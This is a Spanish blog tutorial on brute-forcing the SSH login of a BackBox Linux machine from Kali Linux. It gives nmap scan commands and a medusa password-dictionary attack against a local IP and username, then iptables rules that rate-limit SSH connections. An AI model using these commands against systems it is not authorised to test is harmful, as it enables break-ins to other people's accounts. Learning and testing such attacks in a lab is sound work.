COMO ATACAR EL PUERTO SSH DE BACKBOX DESDE KALI LINUX 2016.2

Hoy he tomado la decisión de mostrar la seguridad de algunas distros de LINUX dedicadas para el mundo de la seguridad. Y me he topado con backdox algunos puertos abiertos. Y si eres de esos “humanos” que esta pensando en cambiarte a backbox o dejar KALI LINUX, ahora vengo a mostrarte como pueden atacarte en backbox.

Que es SSH?

SSH, también conocido como Secure Socket Shell, es un protocolo de red que proporciona a los administradores una manera segura para acceder a un ordenador remoto. SSH también se refiere al conjunto de utilidades que implementan el protocolo. Secure Shell proporciona autenticación fuerte y asegurar las comunicaciones de datos cifrados entre dos equipos que se conectan a través de una red insegura como Internet. SSH es ampliamente utilizado por los administradores de red para la gestión de sistemas y aplicaciones de forma remota, lo que les permite iniciar sesión en otro ordenador a través de una red, ejecutar comandos y mover archivos de un ordenador a otro.

De seguro me preguntarás. Hey Cread puedes editarlo! Claro que podemos asegurarlo pero que pasa si ejecutamos iptables en backbox

screenshot-from-2016-09-07-15-20-24

Tenemos algunas configuraciones en iptables pero ninguna protección para ssh.

ATAQUE

Como atacar a BACKBOX en modo fuerza bruta. Antes de empezar vamos a crearnos un buen diccionario. Pincha aquí para leer de eso.

Para saber los puertos que posee abierto te invito a que vos lo escanees.

 nmap -sV ip
nmap -Pn ip

Ahora observa las dos imagenes.
screenshot-from-2016-09-07-15-36-01

screenshot-from-2016-09-07-15-36-03

 

Tengo mis dos sistemas actualizados y la versión de “NMAP” no me convence.  Y tenemos nuestro resultado. 22 y 111 abierto.

Atacaremos SSH con lo siguientes comandos.

 

 medusa -h Dirección IP  -P (DICCIONARIO) -u nombre de usuario -M ssh
medusa -h  192.168.1.10  -P /root/Desktop/password.lst -u creadpag -M ssh

screenshot-from-2016-09-07-15-18-53
Listo. Ahora solo tienes que ingresar.

 ssh IP

contraseña y juega.

Para evitar estos tiempos de ataques.

iptables -I INPUT -p tcp –dport 22 -i tarjeta_interfaz_red -m state –state NEW -m recent  –set
iptables -I INPUT -p tcp –dport 22 -i tarjeta_interfaz_red -m state –state NEW -m recent –update –seconds 40 –hitcount 3 -j DROP

Espero haberte ayudado. Y no te olvides en compartirlo y recuerda KALI LINUX es unos de los mejores y si estas pensando en cambiarlo te estaré observando. Gracias.
Pronto publicare un video. ATENTO A MI CANAL!